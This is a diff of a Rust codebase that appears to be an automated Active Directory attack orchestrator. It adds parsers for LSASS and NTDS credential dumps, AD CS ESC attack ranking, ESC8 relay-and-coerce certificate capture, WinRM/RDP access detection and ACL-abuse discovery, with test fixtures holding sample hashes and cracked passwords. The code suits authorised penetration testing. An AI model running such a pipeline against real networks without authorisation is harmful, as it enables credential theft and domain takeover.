+154,14 @@ fn extract_template_for_esc(output: &str, esc_type: &str) -> Option<String> { /// Priority for ESC types (lower = more urgent).
fn esc_priority(esc_type: &str) -> i32 { match esc_type { - "esc1" | "esc6" => 1, // Direct enrollment → DA cert - "esc4" | "esc8" => 2, // Template abuse / relay - "esc2" | "esc3" => 3, // Certificate agent - "esc7" | "esc9" => 4, // ManageCA / UPN spoof - "esc5" => 5, // Golden cert (requires CA compromise first) - _ => 6, // ESC10-15 and unknown + "esc1" | "esc6" => 1, // Direct enrollment → DA cert + "esc4" | "esc8" => 2, // Template abuse / relay + "esc2" | "esc3" | "esc15" => 3, // Certificate agent / app policy OID + "esc7" | "esc9" | "esc10" => 4, // ManageCA / UPN spoof / weak mapping + "esc11" => 4, // RPC relay (needs coercion) + "esc5" => 5, // Golden cert (requires CA compromise first) + "esc13" => 4, // Issuance policy + _ => 6, // ESC14 and unknown } } @@ -237,12 +276,13 @@ mod tests { assert_eq!(esc_priority("esc8"), 2); assert_eq!(esc_priority("esc2"), 3); assert_eq!(esc_priority("esc3"), 3); + assert_eq!(esc_priority("esc15"), 3); assert_eq!(esc_priority("esc7"), 4); assert_eq!(esc_priority("esc9"), 4); + assert_eq!(esc_priority("esc10"), 4); + assert_eq!(esc_priority("esc11"), 4); + assert_eq!(esc_priority("esc13"), 4); assert_eq!(esc_priority("esc5"), 5); - assert_eq!(esc_priority("esc10"), 6); - assert_eq!(esc_priority("esc11"), 6); - assert_eq!(esc_priority("esc13"), 6); assert_eq!(esc_priority("unknown"), 6); } @@ -338,4 +378,48 @@ mod tests { assert_eq!(vulns.len(), 1); assert_eq!(vulns[0]["vuln_type"], "adcs_esc8"); } + + #[test] + fn parse_certipy_esc13_does_not_false_positive_esc1() { + // ESC13 should not trigger false positive for ESC1 + let output = "[!] Vulnerabilities\nESC13 : Issuance Policy linked to group"; + let params = json!({"target": "192.168.58.10"}); + let vulns = parse_certipy_find(output, &params); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "adcs_esc13"); + } + + #[test] + fn parse_certipy_ca_host_ip_used_as_target() { + let output = "[!]
Vulnerabilities\nESC1 : enrollee supplies subject"; + let params = json!({ + "target_ip": "192.168.58.10", // DC IP + "ca_host_ip": "192.168.58.50", // CA IP + "domain": "contoso.local" + }); + let vulns = parse_certipy_find(output, &params); + assert_eq!(vulns.len(), 1); + // Should use ca_host_ip, not target_ip + assert_eq!(vulns[0]["target"], "192.168.58.50"); + assert_eq!(vulns[0]["vuln_id"], "adcs_esc1_192.168.58.50"); + assert_eq!(vulns[0]["details"]["ca_host"], "192.168.58.50"); + } + + #[test] + fn esc_word_boundary_match_basic() { + assert!(super::esc_word_boundary_match("esc1 : vulnerable", "esc1")); + assert!(super::esc_word_boundary_match("esc1:", "esc1")); + assert!(!super::esc_word_boundary_match( + "esc13 : vulnerable", + "esc1" + )); + assert!(!super::esc_word_boundary_match( + "esc15 : vulnerable", + "esc1" + )); + assert!(super::esc_word_boundary_match( + "esc13 : vulnerable", + "esc13" + )); + } } diff --git a/ares-tools/src/parsers/cracker.rs b/ares-tools/src/parsers/cracker.rs index 728b41db..d57ea87f 100644 --- a/ares-tools/src/parsers/cracker.rs +++ b/ares-tools/src/parsers/cracker.rs @@ -285,7 +285,7 @@ $krb5asrep$23$michelle@FABRIKAM.LOCAL:8a7a0b3264590ef6:fr3edom fn john_show_tgs_unknown_user() { // John --show for TGS shows ?:password (can't determine username) let output = "--- john --show ---\n\ - ?:iknownothing\n\n\ + ?:P@ssw0rd!\n\n\ 1 password hash cracked, 0 left\n"; let params = json!({ "hash_value": "$krb5tgs$23$*john.smith$CHILD.CONTOSO.LOCAL$CIFS/filesvr01*$abcdef$123456" @@ -293,7 +293,7 @@ $krb5asrep$23$michelle@FABRIKAM.LOCAL:8a7a0b3264590ef6:fr3edom let creds = parse_cracker_output(output, &params); assert_eq!(creds.len(), 1); assert_eq!(creds[0]["username"], "john.smith"); - assert_eq!(creds[0]["password"], "iknownothing"); + assert_eq!(creds[0]["password"], "P@ssw0rd!"); assert_eq!(creds[0]["domain"], "CHILD.CONTOSO.LOCAL"); assert_eq!(creds[0]["source"], "cracked:john"); } @@ -302,7 +302,7 @@ $krb5asrep$23$michelle@FABRIKAM.LOCAL:8a7a0b3264590ef6:fr3edom fn john_show_tgs_unknown_user_no_hash_param() { // Without hash_value param, ?:password is skipped let output = "--- john --show ---\n\ - ?:iknownothing\n\n\ + ?:P@ssw0rd!\n\n\ 1 password hash cracked, 0 left\n"; let params = json!({"domain": "contoso.local"}); let creds = parse_cracker_output(output, &params); diff --git a/ares-tools/src/parsers/credential_tools.rs b/ares-tools/src/parsers/credential_tools.rs index 3a0d7d60..76099f80 100644 --- a/ares-tools/src/parsers/credential_tools.rs +++ b/ares-tools/src/parsers/credential_tools.rs @@ -7,13 +7,43 @@ use std::sync::LazyLock; // ── Lsassy ────────────────────────────────────────────────────────────────── +/// Real ANSI escape sequences (e.g. `\x1b[1;33m`). +static ANSI_ESC_RE: LazyLock<Regex> = + LazyLock::new(|| Regex::new(r"\x1b\[[0-9;]*[a-zA-Z]").expect("ansi esc regex")); + +/// Bare-text ANSI leftovers when ESC bytes are stripped during transport. +/// Matches things like `[1;33m`, `[0m`, `[32m` — but NOT arbitrary bracketed +/// text like `[LSASSY]` or `[NT]`. +static ANSI_BARE_RE: LazyLock<Regex> = + LazyLock::new(|| Regex::new(r"\[\d+(?:;\d+)*m").expect("ansi bare regex")); + +/// Match the first plausibly-clean `DOMAIN\username` token in a line. +/// +/// Domain: starts with alphanumeric, allows alphanumerics/`._-`, no spaces or +/// brackets — keeps us from sucking up `"SMB 192.168.58.10 445 DC01 [+] contoso.local"` +/// as the "domain" when the real domain prefix appears later in the line. +/// +/// Captures: 1=domain, 2=username, 3=remainder of line.
+static LSASSY_DOMAIN_USER_RE: LazyLock<Regex> = LazyLock::new(|| { + Regex::new(r"(?:^|[\s\]\)>])([A-Za-z0-9][A-Za-z0-9._-]*)\\([A-Za-z0-9._$@-]+)(.*)$") + .expect("lsassy domain\\user regex") +}); + +/// Match `[NT] <hash>` (with optional `[SHA1] <hash>` suffix) in lsassy output. +/// Captures: 1=NT hash (32 hex chars). +static LSASSY_NT_HASH_RE: LazyLock<Regex> = + LazyLock::new(|| Regex::new(r"\[NT\]\s+([0-9a-fA-F]{32})\b").expect("lsassy NT hash regex")); + /// Parse lsassy output for cleartext credentials and NTLM hashes. /// -/// Lsassy dumps credentials from LSASS memory: +/// Handles several output flavors: /// ```text -/// CONTOSO\alice.johnson Password123 -/// CONTOSO\bob.smith 31d6...hash... +/// CONTOSO\alice Password123 +/// CONTOSO\bob aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 +/// SMB 192.168.58.10 445 DC01 [LSASSY] CONTOSO\carol [NT] 31d6... [SHA1] f9e3... /// ``` +/// ANSI color codes (real ESC sequences and bare-text leftovers like `[1;33m`) +/// are stripped before parsing. pub fn parse_lsassy(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>) { let default_domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); @@ -21,19 +51,15 @@ let mut creds = Vec::new(); for line in output.lines() { + let line = strip_ansi(line.trim()); let line = line.trim(); - // Skip noise lines - if line.is_empty() - || line.starts_with('[') - || line.starts_with("INFO") - || line.starts_with("WARNING") - || line.starts_with("ERROR") - || line.contains("authentication") - { + if line.is_empty() { + continue; + } + if is_lsassy_noise(line) { continue; } - // Try DOMAIN\username:password or DOMAIN\username password if let Some((domain, username, secret)) = parse_lsassy_line(line) { let domain = if domain.is_empty() { default_domain.to_string() @@ -65,35 +91,100 @@ pub fn parse_lsassy(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>) { (hashes, creds) } +/// Strip ANSI color codes and bare-text leftovers (when ESC bytes were dropped). +fn strip_ansi(s: &str) -> String { + let s = ANSI_ESC_RE.replace_all(s, ""); + ANSI_BARE_RE.replace_all(&s, "").to_string() +} + +/// Identify lines that lsassy emits but contain no credential we can parse. +fn is_lsassy_noise(line: &str) -> bool { + line.starts_with("INFO") + || line.starts_with("WARNING") + || line.starts_with("ERROR") + || line.contains("authentication") + // Lines that are pure status (start with `[`/`(`) and contain no `\` + // can't carry a DOMAIN\user pair — skip them up-front. + || ((line.starts_with('[') || line.starts_with('(')) + && !line.contains('\\')) +} + fn parse_lsassy_line(line: &str) -> Option<(String, String, String)> { - // Format: DOMAIN\username password OR DOMAIN\username:password - if let Some(backslash_pos) = line.find('\\') { - let domain = line[..backslash_pos].trim().to_string(); - let rest = &line[backslash_pos + 1..]; - - // Try splitting on whitespace first (most common lsassy format) - // This must come before colon check because NTLM hashes contain colons - let parts: Vec<&str> = rest.splitn(2, char::is_whitespace).collect(); - if parts.len() == 2 && !parts[1].trim().is_empty() { - let username = parts[0].trim().to_string(); - let secret = parts[1].trim().to_string(); - if !username.is_empty() && !secret.is_empty() { - return Some((domain, username, secret));
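For intuition, a standalone sketch of what `LSASSY_DOMAIN_USER_RE` captures on a transport-prefixed line (the input mirrors the nxc-style fixtures in the tests below; this uses the `regex` crate directly):

```rust
// Standalone sketch of the DOMAIN\user regex above (input line illustrative).
let re = regex::Regex::new(
    r"(?:^|[\s\]\)>])([A-Za-z0-9][A-Za-z0-9._-]*)\\([A-Za-z0-9._$@-]+)(.*)$",
).unwrap();
let line = r"SMB 192.168.58.10 445 DC01 [+] contoso.local\Administrator:31d6cfe0d16ae931b73c59d7e0c089c0";
let caps = re.captures(line).unwrap();
assert_eq!(&caps[1], "contoso.local"); // clean domain, not the SMB prefix
assert_eq!(&caps[2], "Administrator");
assert_eq!(&caps[3], ":31d6cfe0d16ae931b73c59d7e0c089c0"); // remainder keeps the ':' delimiter
```

+ // Special-case `[NT] hash` form first — it's unambiguous and the regex + // anchors are friendlier to a clean DOMAIN\user lookahead.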
+ if let Some(nt_caps) = LSASSY_NT_HASH_RE.captures(line) { + if let Some(caps) = LSASSY_DOMAIN_USER_RE.captures(line) { + let domain = caps.get(1)?.as_str(); + let username = caps.get(2)?.as_str(); + if is_clean_domain(domain) && !username.is_empty() { + return Some(( + domain.to_string(), + username.to_string(), + nt_caps[1].to_string(), + )); } } + } - // Fallback: colon-separated (DOMAIN\username:password) - if let Some(colon_pos) = rest.find(':') { - let username = rest[..colon_pos].trim().to_string(); - let after_colon = rest[colon_pos + 1..].trim().to_string(); - if !username.is_empty() && !after_colon.is_empty() { - return Some((domain, username, after_colon)); - } + // General DOMAIN\user form: parse the first clean DOMAIN\user token, then + // pull a secret out of the remainder. + let caps = LSASSY_DOMAIN_USER_RE.captures(line)?; + let domain = caps.get(1)?.as_str(); + let username = caps.get(2)?.as_str(); + let rest = caps.get(3)?.as_str(); + + if !is_clean_domain(domain) || username.is_empty() { + return None; + } + + // Colon-prefixed (DOMAIN\user:secret) — preserve full LM:NT pair. This is + // a terminal branch: once we see the colon delimiter the secret (or lack + // thereof) is unambiguous, so falling through to the whitespace branch + // below would just re-parse the same `:marker` string as a bare token. + if let Some(stripped) = rest.strip_prefix(':') { + let secret = stripped.trim(); + if secret.is_empty() || is_lsassy_marker(secret) { + return None; } + return Some((domain.to_string(), username.to_string(), secret.to_string())); } + + // Whitespace-separated (DOMAIN\user secret). + let secret = rest.trim(); + if !secret.is_empty() { + // Take only the first whitespace-delimited token to avoid swallowing + // trailing `[SHA1] …` decorations into the password. + let first = secret.split_whitespace().next().unwrap_or(""); + if !first.is_empty() && !is_lsassy_marker(first) { + return Some((domain.to_string(), username.to_string(), first.to_string())); + } + } + None } +/// Recognize lsassy field-marker tokens (e.g. `[PWD]`, `[TGT]`, `[LM]`, +/// `[SHA1]`). These are *labels* lsassy emits when it found a credential +/// of that type but redacted/elided the value — they are not secrets. +/// Storing them as passwords poisoned operation state and caused tools to +/// receive literal `[PWD]`/`[TGT]` strings as auth values. +fn is_lsassy_marker(s: &str) -> bool { + let t = s.trim(); + t.starts_with('[') && t.ends_with(']') && t.len() <= 16 +} + +/// Validate a DOMAIN string looks like an AD domain prefix, not garbage. +fn is_clean_domain(d: &str) -> bool { + !d.is_empty() + && d.len() < 64 + && d.chars() + .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_') + && d.chars() + .next() + .map(|c| c.is_ascii_alphanumeric()) + .unwrap_or(false) +} + fn looks_like_ntlm_hash(s: &str) -> bool { // NTLM hash: 32 hex chars, or LM:NT format (32:32) let s = s.trim(); @@ -577,4 +668,106 @@ _msdcs.contoso.local. CNAME dc01.contoso.local."; assert_eq!(creds[0]["username"], "alice"); assert_eq!(creds[0]["password"], "Password123"); } + + #[test] + fn lsassy_handles_nxc_prefix_with_nt_hash_marker() { + // Real lsassy-via-nxc line format: a transport prefix, then the + // credential block. Domain prefix appears mid-line, not at the start. 
+ let output = "\ +SMB 192.168.58.10 445 DC01 [LSASSY] CONTOSO\\Administrator [NT] 31d6cfe0d16ae931b73c59d7e0c089c0 [SHA1] f9e37e83b83c47a93c2f09f66408631b16769e6a"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, &params); + assert_eq!(hashes.len(), 1, "should pick up the [NT] hash"); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["username"], "Administrator"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } + + #[test] + fn lsassy_strips_real_ansi_escape_sequences() { + // Real ANSI from the wire — the parser must not see them. + let output = + "\x1b[1;33mCONTOSO\\alice\x1b[0m \x1b[1;32m[NT]\x1b[0m 31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, _) = parse_lsassy(output, &params); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "alice"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + } + + #[test] + fn lsassy_strips_bare_text_ansi_leftovers() { + // When ESC bytes are stripped during transport, the visible style + // codes (`[1;33m`, `[0m`) survive as bare text. Strip them too. + let output = "[1;33mCONTOSO\\alice[0m [1;32m[NT][0m 31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, _) = parse_lsassy(output, &params); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "alice"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } + + #[test] + fn lsassy_rejects_garbage_domain_from_naive_first_backslash() { + // The pre-fix bug: nxc prefix has no backslash, but `contoso.local\Administrator:HASH` + // sits in the line. Naive first-backslash parsing wrongly stuffed the + // entire prefix ("SMB ... DC01 [+] contoso.local") into `domain`. + // The fix must extract a clean domain ("contoso.local") instead. + let output = "\ +SMB 192.168.58.10 445 DC01 [+] contoso.local\\Administrator:31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, &params); + assert_eq!(hashes.len(), 1); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["domain"], "contoso.local"); + assert_eq!(hashes[0]["username"], "Administrator"); + } + + #[test] + fn lsassy_rejects_path_like_backslashes() { + // Backslashes in Windows paths shouldn't be treated as DOMAIN\user. + // The token after `\` here is empty / has no secret following. + let output = "[*] Loading file C:\\Windows\\Temp\\dump.dmp"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, &params); + assert!(hashes.is_empty()); + assert!(creds.is_empty()); + } + + #[test] + fn lsassy_rejects_pwd_tgt_field_markers_as_passwords() { + // lsassy emits `[PWD]` / `[TGT]` as *labels* when it found a credential + // of that type but redacted/elided the value. Storing the marker as a + // password poisoned operation state and made tools receive literal + // `[PWD]`/`[TGT]` strings as auth values, breaking lateral movement.
+ let output = "\ +CHILD\\DC01$ [PWD] +CHILD\\eve [TGT] +CHILD\\eve:[PWD] +CONTOSO\\real_user RealPassword123"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, &params); + assert!(hashes.is_empty()); + assert_eq!( + creds.len(), + 1, + "only the real password should be stored, got: {creds:?}" + ); + assert_eq!(creds[0]["username"], "real_user"); + assert_eq!(creds[0]["password"], "RealPassword123"); + } + + #[test] + fn lsassy_does_not_swallow_sha1_decoration_into_password() { + // Whitespace-separated form with `[SHA1] …` trailing decoration. + // The parser should pick the NT hash, not concatenate the rest. + let output = "CONTOSO\\bob 31d6cfe0d16ae931b73c59d7e0c089c0 [SHA1] f9e37e83b83c47a93c2f09f66408631b16769e6a"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, &params); + assert_eq!(hashes.len(), 1); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } } diff --git a/ares-tools/src/parsers/mod.rs b/ares-tools/src/parsers/mod.rs index 291ec55a..9d946445 100644 --- a/ares-tools/src/parsers/mod.rs +++ b/ares-tools/src/parsers/mod.rs @@ -10,6 +10,7 @@ mod credential_tools; mod delegation; mod mssql; mod nmap; +mod ntsd; mod secrets; mod smb; mod spider; @@ -27,6 +28,7 @@ pub use credential_tools::{ pub use delegation::{extract_delegation_account, parse_delegation}; pub use mssql::{parse_mssql_impersonation, parse_mssql_linked_servers}; pub use nmap::{flush_nmap_host, parse_nmap_output}; +pub use ntsd::parse_acl_enumeration; pub use secrets::{parse_asrep_roast, parse_kerberoast, parse_secretsdump}; pub use smb::{parse_netexec_smb, parse_smb_signing}; pub use spider::parse_spider_credentials; @@ -88,7 +90,11 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value "run_bloodhound" => { // BloodHound collection doesn't produce immediate discoveries } - "secretsdump" | "secretsdump_kerberos" => { + "secretsdump" | "secretsdump_kerberos" | "forge_inter_realm_and_dump" => { + // forge_inter_realm_and_dump runs ticketer + secretsdump in one + // call. The orchestrator passes `target_domain` so secretsdump + // hashes get attributed to the dumped (target/parent) realm, + // not the forging (source/child) realm. let (hashes, creds) = parse_secretsdump(output, params); if !hashes.is_empty() { discoveries["hashes"] = Value::Array(hashes); @@ -97,6 +103,32 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } + "raise_child" => { + // raiseChild.py performs the parent-domain NTDS dump in standard + // secretsdump format (lines like "domain.local/user:RID:LM:NT:::" + // or "DOMAIN\\user:RID:..."). Derive parent FQDN from child_domain + // and pass as target_domain so bare-username lines and NetBIOS + // prefixes get attributed to the parent forest root.
+ let child_domain = params + .get("child_domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + let parent_domain = child_domain + .split_once('.') + .map(|(_, rest)| rest) + .unwrap_or(child_domain); + let mut params_with_target = params.clone(); + if let Some(obj) = params_with_target.as_object_mut() { + obj.insert("target_domain".into(), json!(parent_domain)); + } + let (hashes, creds) = parse_secretsdump(output, &params_with_target); + if !hashes.is_empty() { + discoveries["hashes"] = Value::Array(hashes); + } + if !creds.is_empty() { + discoveries["credentials"] = Value::Array(creds); + } + } "kerberoast" => { let hashes = parse_kerberoast(output, params); if !hashes.is_empty() { @@ -177,7 +209,7 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } - "password_spray" => { + "password_spray" | "smb_login_check" => { let creds = parse_spray_success(output, params); if !creds.is_empty() { discoveries["credentials"] = Value::Array(creds); @@ -244,6 +276,139 @@ pub fn parse_tool_output(tool_name: &str, output: &str, params: &Value) -> Value discoveries["credentials"] = Value::Array(creds); } } + "ldap_acl_enumeration" => { + let vulns = parse_acl_enumeration(output, params); + if !vulns.is_empty() { + discoveries["vulnerabilities"] = Value::Array(vulns); + } + } + "password_policy" => { + // Password policy is informational metadata, not an exploitable vuln — + // surfacing it as `vulnerabilities[]` makes the orchestrator route it to + // the exploit agent, which has no spray tool and dead-ends every time. + // The lockout/min-length details inform spray cadence elsewhere; we + // expose them under a dedicated key so consumers can read without the + // exploit-routing side effect. + let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); + let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + if !output.is_empty() && !domain.is_empty() { + let lockout_threshold = output + .lines() + .find(|l| l.to_lowercase().contains("account lockout threshold")) + .and_then(|l| l.split(':').next_back().map(|s| s.trim().to_string())); + let min_length = output + .lines() + .find(|l| l.to_lowercase().contains("minimum password length")) + .and_then(|l| l.split(':').next_back().map(|s| s.trim().to_string())); + let mut details = serde_json::Map::new(); + details.insert("domain".into(), json!(domain)); + details.insert("target_ip".into(), json!(target)); + if let Some(ref lt) = lockout_threshold { + details.insert("lockout_threshold".into(), json!(lt)); + } + if let Some(ref ml) = min_length { + details.insert("min_password_length".into(), json!(ml)); + } + discoveries["password_policies"] = json!([details]); + } + } + "evil_winrm" => { + // Detect successful WinRM connection from evil-winrm output. + // A successful connection typically shows "Evil-WinRM shell" or + // output from executed commands (e.g., "whoami" returning a username).
+ let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + if output.contains("Evil-WinRM") + || output.contains("\\") // whoami output like DOMAIN\user + || output.contains("PS >") + { + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("winrm_access_{}", target.replace('.', "_")), + "vuln_type": "winrm_access", + "target": target, + "details": { + "description": format!("WinRM access confirmed on {target}"), + "target_ip": target, + }, + }]); + } + } + "relay_and_coerce" => { + // Composite ESC8 tool prints `PFX_FILE=...` and `RELAYED_USER=...` + // markers when the cert is captured. Convert to a + // `certificate_obtained` vuln so `auto_certipy_auth` picks it up. + let pfx_path = output + .lines() + .find_map(|l| l.trim().strip_prefix("PFX_FILE=")) + .map(str::trim); + let relayed_user = output + .lines() + .find_map(|l| l.trim().strip_prefix("RELAYED_USER=")) + .map(str::trim); + + if let Some(pfx) = pfx_path { + // Cert is for the target DC's realm (the relayed identity's + // home), not the coercion credential's domain. Caller passes + // `target_domain` for cross-forest cases; fall back to + // `coerce_domain` for same-forest. + let target_domain = params + .get("target_domain") + .and_then(|v| v.as_str()) + .or_else(|| params.get("coerce_domain").and_then(|v| v.as_str())) + .unwrap_or(""); + let coerce_target = params + .get("coerce_target") + .and_then(|v| v.as_str()) + .or_else(|| params.get("target_dc").and_then(|v| v.as_str())) + .unwrap_or(""); + let user = relayed_user.unwrap_or(""); + let mut details = serde_json::Map::new(); + details.insert("pfx_path".into(), json!(pfx)); + if !target_domain.is_empty() { + details.insert("domain".into(), json!(target_domain)); + } + if !user.is_empty() { + details.insert("target_user".into(), json!(user)); + details.insert("account_name".into(), json!(user)); + } + if !coerce_target.is_empty() { + details.insert("target_ip".into(), json!(coerce_target)); + } + details.insert("source".into(), json!("relay_and_coerce")); + details.insert( + "description".into(), + json!(format!( + "ESC8 relay captured certificate for {user} in {target_domain}" + )), + ); + let user_safe = user.replace(['$', '.'], "_"); + let domain_safe = target_domain.replace('.', "_"); + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("certificate_obtained_{user_safe}_{domain_safe}"), + "vuln_type": "certificate_obtained", + "target": coerce_target, + "details": details, + }]); + } + } + "xfreerdp" => { + // Detect successful RDP authentication from xfreerdp output. + let target = params.get("target").and_then(|v| v.as_str()).unwrap_or(""); + // xfreerdp success: shows "Authentication only" or specific success patterns + let success = output.contains("Authentication only, exit status 0") + || (output.contains("connected to") && !output.contains("ERRCONNECT")) + || output.contains("FREERDP_CB_SESSION_STARTED"); + if success { + discoveries["vulnerabilities"] = json!([{ + "vuln_id": format!("rdp_access_{}", target.replace('.', "_")), + "vuln_type": "rdp_access", + "target": target, + "details": { + "description": format!("RDP access confirmed on {target}"), + "target_ip": target, + }, + }]); + } + } _ => {} } @@ -626,6 +791,28 @@ SMB 192.168.58.121 445 DC01 bob 2026-03-25 23:21:09 0 Bob"#; assert!(!disc["hashes"].as_array().unwrap().is_empty()); } + #[test] + fn parse_tool_output_raise_child_attributes_to_parent() { + // raise_child dumps the parent NTDS in slash-separated FQDN format. 
+ // Parser must derive parent_domain from child_domain and attribute hashes there. + let output = "\ +[*] Forest is contoso.local +contoso.local/krbtgt:502:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: +contoso.local/Administrator:500:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::"; + let params = json!({ + "child_domain": "child.contoso.local", + "username": "testuser", + "password": "REDACTED", + }); + let disc = parse_tool_output("raise_child", output, ¶ms); + let hashes = disc["hashes"].as_array().expect("hashes array"); + assert_eq!(hashes.len(), 2); + assert_eq!(hashes[0]["username"], "krbtgt"); + assert_eq!(hashes[0]["domain"], "contoso.local"); + assert_eq!(hashes[1]["username"], "Administrator"); + assert_eq!(hashes[1]["domain"], "contoso.local"); + } + #[test] fn parse_tool_output_kerberoast() { let output = "$krb5tgs$23$*svc_sql$CONTOSO$contoso.local/svc_sql*$abc"; @@ -711,6 +898,75 @@ SMB 192.168.58.121 445 DC01 bob 2026-03-25 23:21:09 0 Bob"#; assert_eq!(td.len(), 1, "Duplicate trusted domains should be deduped"); } + #[test] + fn parse_tool_output_relay_and_coerce_emits_cert_vuln() { + let output = "RELAY_PID=1234\n\ + === Coercing via MS-DFSNM ===\n\ + CERT_CAPTURED_VIA=MS-DFSNM\n\ + PFX_FILE=/tmp/ares_relay_999/DC01$.pfx\n\ + RELAYED_USER=DC01$\n\ + === RELAY LOG ===\n\ + [*] Servers started\n"; + let params = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "target_domain": "contoso.local", + "coerce_domain": "child.contoso.local", + }); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + let vulns = disc["vulnerabilities"].as_array().expect("vulns array"); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "certificate_obtained"); + assert_eq!( + vulns[0]["details"]["pfx_path"], + "/tmp/ares_relay_999/DC01$.pfx" + ); + assert_eq!(vulns[0]["details"]["domain"], "contoso.local"); + assert_eq!(vulns[0]["details"]["target_user"], "DC01$"); + assert_eq!(vulns[0]["target"], "192.168.58.20"); + } + + #[test] + fn parse_tool_output_relay_and_coerce_no_capture_no_vuln() { + let output = "RELAY_PID=1234\n\ + === Coercing via MS-DFSNM ===\n\ + === Coercing via MS-EFSR ===\n\ + === Coercing via MS-RPRN ===\n\ + === RELAY LOG ===\n\ + [*] Servers started\n"; + let params = json!({"ca_host": "192.168.58.10", "coerce_target": "192.168.58.20"}); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + assert!(disc.get("vulnerabilities").is_none()); + } + + #[test] + fn parse_tool_output_relay_and_coerce_falls_back_to_coerce_domain() { + // Same-forest case: only coerce_domain present. + let output = "PFX_FILE=/tmp/ares_relay_1/dc01$.pfx\nRELAYED_USER=dc01$\n"; + let params = json!({ + "ca_host": "192.168.58.10", + "coerce_target": "192.168.58.20", + "coerce_domain": "contoso.local", + }); + let disc = parse_tool_output("relay_and_coerce", output, ¶ms); + let vulns = disc["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["details"]["domain"], "contoso.local"); + } + + #[test] + fn parse_tool_output_relay_and_coerce_legacy_target_dc_alias() { + // Backwards-compat: orchestrator state may still emit `target_dc`. 
+ let output = "PFX_FILE=/tmp/ares_relay_2/dc01$.pfx\nRELAYED_USER=dc01$\n"; + let params = json!({ + "ca_host": "192.168.58.10", + "target_dc": "192.168.58.20", + "coerce_domain": "contoso.local", + }); + let disc = parse_tool_output("relay_and_coerce", output, &params); + let vulns = disc["vulnerabilities"].as_array().unwrap(); + assert_eq!(vulns[0]["target"], "192.168.58.20"); + } + #[test] fn parse_tool_output_smb_signing_check() { let output = "SMB 192.168.58.10 445 DC01 signing:True"; diff --git a/ares-tools/src/parsers/ntsd.rs b/ares-tools/src/parsers/ntsd.rs new file mode 100644 index 00000000..8f5d527b --- /dev/null +++ b/ares-tools/src/parsers/ntsd.rs @@ -0,0 +1,759 @@ +//! nTSecurityDescriptor binary parser. +//! +//! Parses Windows SECURITY_DESCRIPTOR binary data (self-relative format) from +//! LDAP nTSecurityDescriptor attribute values to extract DACL ACE entries. +//! Identifies dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword, etc.) +//! and returns them as structured vulnerability discoveries. + +use serde_json::{json, Value}; + +// ── Well-known SID prefixes ──────────────────────────────────────────────── + +/// Map well-known SIDs to friendly names. +fn well_known_sid(sid: &str) -> Option<&'static str> { + match sid { + "S-1-0-0" => Some("Nobody"), + "S-1-1-0" => Some("Everyone"), + "S-1-5-7" => Some("ANONYMOUS LOGON"), + "S-1-5-10" => Some("SELF"), + "S-1-5-11" => Some("Authenticated Users"), + "S-1-5-18" => Some("SYSTEM"), + "S-1-5-32-544" => Some("BUILTIN\\Administrators"), + "S-1-5-32-545" => Some("BUILTIN\\Users"), + _ => None, + } +} + +// ── Access mask flags ────────────────────────────────────────────────────── + +const GENERIC_ALL: u32 = 0x10000000; +const GENERIC_WRITE: u32 = 0x40000000; +const ADS_RIGHT_DS_CONTROL_ACCESS: u32 = 0x00000100; +const ADS_RIGHT_DS_WRITE_PROP: u32 = 0x00000020; +const ADS_RIGHT_DS_SELF: u32 = 0x00000008; +const WRITE_DACL: u32 = 0x00040000; +const WRITE_OWNER: u32 = 0x00080000; +const FULL_CONTROL: u32 = 0x000F01FF; + +// ── Object type GUIDs for extended rights ────────────────────────────────── + +/// User-Force-Change-Password (Reset Password extended right) +const GUID_FORCE_CHANGE_PASSWORD: &str = "00299570-246d-11d0-a768-00aa006e0529"; +/// Self-Membership (validated write to group member attribute) +const GUID_SELF_MEMBERSHIP: &str = 